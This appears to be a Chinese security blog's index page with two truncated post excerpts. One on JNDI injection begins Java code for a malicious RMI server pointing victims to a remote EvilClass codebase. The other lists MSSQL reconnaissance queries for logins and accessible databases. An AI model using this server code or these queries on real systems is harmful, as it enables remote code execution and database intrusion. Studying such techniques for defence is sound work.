https://mtnsmdbt.oss-cn-hangzhou.aliyuncs.com/photo.jpg

JNDI注入原理及利用

RMI-攻击客户端 分析恶意服务端 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.Reference; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; public class Main_Evil { public static void main(String[] args) { try { Registry registry = LocateRegistry.createRegistry(1099); Reference aa = new Reference("EvilClass", "EvilClass", "http://192.168.1.3:9901/"); ReferenceWrapper refObjWrapper =

Mssql利用方式整理

基础信息处理 主机用户信息exec xp_logininfo 获取数据库可登录用户信息select is_disabled, loginproperty(name,'Isexpired') is_expired, loginproperty(name,'Islocked') is_locked, * from sys.server_principals 获取当前用户可访问的数据库SELECT * FROM sys.databases WHERE HAS_DBACCESS(name) = 1 获